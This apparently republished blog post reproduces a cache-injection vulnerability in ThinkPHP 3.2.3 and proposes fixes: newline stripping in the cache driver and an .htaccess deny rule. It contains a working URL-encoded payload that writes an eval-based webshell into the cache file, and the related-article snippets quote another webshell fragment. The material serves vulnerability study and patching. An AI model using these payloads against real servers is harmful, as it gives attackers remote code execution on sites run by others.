ThinkPhp3.2.3缓存漏洞复现以及修复建议

最新推荐文章于 2024-08-15 09:11:40 发布
最新推荐文章于 2024-08-15 09:11:40 发布
阅读量1.4w 收藏 4
点赞数 1
原文链接:https://www.secfree.com/a/248.html
版权

小编作为一个php(拍黄片)的程序员,今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。

漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议

QQ截图20170811125900.jpg

首先我们下载最新的thinkphp3.2.3的框架  搭建好

QQ截图20170811130029.jpg

按照phpoop牛的审计  我们来写代码

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {

    public function index(){
        $a=I('post.a3');
        S('name',$a);
    }
}

然后我们来post一段代码

a3=%0A%24a%3deval(%24_POST%5b%27a3%27%5d)%3b%2f%2f

QQ截图20170811131500.jpg

QQ截图20170811131527.jpg

我们可以看到缓存文件已经出现了

至于这个缓存名称

就是

S('name',$a);

中的name的md5

QQ截图20170811134359.jpg

我们来连接这个一句话

我们可以看到

这个漏洞是可以利用的但是这个漏洞比较鸡肋

我们在开发的过程种s缓存一般不会用作接收参数的缓存(me就是 接收过来的参数只查询并不进行其他操作)

thinkphp官方手册当中http://document.thinkphp.cn/manual_3_2.html#input_var

详细的讲解了I函数

我们在实际应用的过程当中有详细的解释  比如我们要接收id的时候 id是整数

那么就可以写成I('post.id/d')这样强制转换为整数

QQ截图20170811135547.jpg

实际应用种很少有把接受过来的参数直接缓存起来

修复方案也很简单

  1. phpoop牛的方法

    打开文件:thinkphp\library\think\cache\driver\File.php

    public function set($name, $value, $expire = null) 方法

    添加:$data = str_replace(PHP_EOL, '', $data);  

     

    /**
     * 写入缓存
     * @access public
     * @param string $name 缓存变量名
     * @param mixed $value  存储数据
     * @param int $expire  有效时间 0为永久
     * @return boolean
     */
    public function set($name,$value,$expire=null) {
        N('cache_write',1);
        if(is_null($expire)) {
            $expire =  $this->options['expire'];
        }
        $filename   =   $this->filename($name);
        $data   =   serialize($value);
        $data = str_replace(PHP_EOL, '', $data); //新增这句代码     修复代码在这里/***********************/
        if( C('DATA_CACHE_COMPRESS') && function_exists('gzcompress')) {
            //数据压缩
            $data   =   gzcompress($data,3);
        }
        if(C('DATA_CACHE_CHECK')) {//开启数据校验
            $check  =  md5($data);
        }else {
            $check  =  '';
        }
        $data    = "<?php\n//".sprintf('%012d',$expire).$check.$data."\n?>";
        $result  =   file_put_contents($filename,$data);
        if($result) {
            if($this->options['length']>0) {
                // 记录缓存队列
                $this->queue($name);
            }
            clearstatcache();
            return true;
        }else {
            return false;
        }
    }

2.在Application\Runtime目录中创建文件.htaccess

<IfModule mod_rewrite.c>
deny from all
</IfModule>

QQ截图20170811140339.jpg

 

QQ截图20170811140421.jpg

资料收集库
关注
【安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1653
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index中传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5833
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
ThinkPHP远程代码执行漏洞分析及防御指南
最新发布
gitblog_00643的博客
08-15 954
ThinkPHP远程代码执行漏洞分析及防御指南 ThinkphpRCE项目地址:https://gitcode.com/gh_mirrors/th/ThinkphpRCE 一、项目介绍 1.1 概述 ThinkPHP是一款流行的PHP开发框架,以其简洁高效的特性深受开发者喜爱。然而,在一些版本中发现的安全漏洞威胁到了基于该框架构建的Web应用程序的安全性。其中,“thinkphp-RCE-POC...
[复现]Thinkphp3.2.3 漏洞
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
thinkphp3.2.3漏洞_命令执行漏洞
weixin_39724287的博客
11-21 816
No.1漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数中的参数时,...
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
免费thinkPHP3.2.3框架
07-20
《免费ThinkPHP3.2.3框架深度解析》 ThinkPHP3.2.3是一款深受开发者喜爱的开源PHP框架,以其简洁、高效的特性在Web开发领域占据了一席之地。本篇将深入探讨该框架的核心特点、主要功能以及如何进行实际应用。 一、...
ThinkPHP3.2.3的SQL注入漏洞复现——考古?
Mrs_H的博客
11-11 1514
这里写目录标题关于ThinkPHP的SQL注入漏洞一.前言二.正文1.数据处理流程2.注入点一,数组注入3.注入点二,exp注入后记 关于ThinkPHP的SQL注入漏洞 一.前言 最近拖延症又犯难了,导致很久都没有时间来写这个文章。而且因为一些奇怪的缘故,导致自己的MySQL数据库中间崩了好几次,导致这次的漏洞复现磕磕绊绊的。同时这也是我自己第一次做代码审计,效率着实算不上高,就以此来记录一下自己这次的学习(考古)过程吧。 二.正文 1.数据处理流程 环境搭建方面,就用thinkphp官网上的历史遗留版本
Thinkphp3.2.3反序列化漏洞复现分析
cosmoslin的博客
11-13 968
环境搭建 Phpstudy: OS: Windows PHP: 5.6.9 ThinkPHP: 3.2.3 控制器写入: /Application/Home/Controller/IndexController.class.php public function index(){ unserialize(base64_decode($_GET[1]));//加上这一句 } pop链分析 先从__destruct方法入手,全局搜索 路径:ThinkPHP/Library/Think/Image.
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
think+php+漏洞,ThinkPHP3.2.3漏洞分析
weixin_32824625的博客
03-28 1050
一、前言ThinkPHP漏洞分析文章有很多,这里我只是想对我学习的过程进行一个记录,有点菜,希望大佬不要喷我。二、where注入在控制器中,写个demo,利用字符串方式作为where传参时存在注入public functiongetuser(){$user = M('User')->where('id='.I('id'))->find();dump($user);}在变量user...
thinkphp3.2.3漏洞_信息安全漏洞月报(2020年5月)
weixin_39945795的博客
11-23 2990
漏洞态势根据国家信息安全漏洞库(CNNVD)统计,2020年5月份采集安全漏洞共1186个。本月接报漏洞16377个,其中信息技术产品漏洞(通用型漏洞)201个,网络信息系统漏洞(事件型漏洞)16176个。重大漏洞预警微软多个安全漏洞:包括Microsoft SharePoint 安全漏洞(CNNVD-202005-567、CVE-2020-1024)、Microsof...
Thinkphp cache缓存函数远程代码执行漏洞
feng的博客
03-10 1928
前言 环境创建: composer create-project topthink/think=5.0.10 thinkphp5.0.10 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.10" }, composer update 影响版本:3.2.3-5.0.10 index控制器里写个cache()函数: public function cache() {
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 2072
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
ThinkPHP 3.2 开启 cache缓存的注意事项,过滤非法字符
____
10-22 6175
开启缓存的配置文件 /Application/Common/conf/cache.php源码如下: <?php return array( //'配置项'=>'配置值' 'LAYOUT_ON' => true, 'HTML_CACHE_ON' => strpos($_SERVER['HTTP_HOST'], '.') !== false, // 开
thinkPHP3.2.3反序列化漏洞
qq_50589021的博客
10-10 1443
前言 ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 利用链: __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()-> 搭建: 路径:/Application/Home/Controller/IndexController.class.php public fu
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1185
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
thinkphp3.2.3 rce漏洞复现
08-12
根据引用中提供的信息,ThinkPHP3.2.x存在一个RCE(远程代码执行)漏洞。根据引用中的描述,我们可以通过控制`$this->img`变量来找到`destroy()`函数。在`ThinkPHP/Library/Think/Session/Driver/Memcache.class.php`文件中的`Memcache`类的`destroy()`函数中可以找到这个函数。请注意,如果使用PHP7,在调用有参函数但没有传入参数的情况下会报错,因此应该使用PHP5而不是PHP7。具体的漏洞利用方法是,在URL中注入`?id=1*/ into outfile "path/1.php" LINES STARTING BY '<?php eval($_POST<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [wp 篇 DASCTF Thinkphp 3.2.3RCE复现](https://blog.csdn.net/weixin_46203060/article/details/119532553)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [【安全漏洞ThinkPHP 3.2.3 漏洞复现](https://blog.csdn.net/2201_75857869/article/details/129316463)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值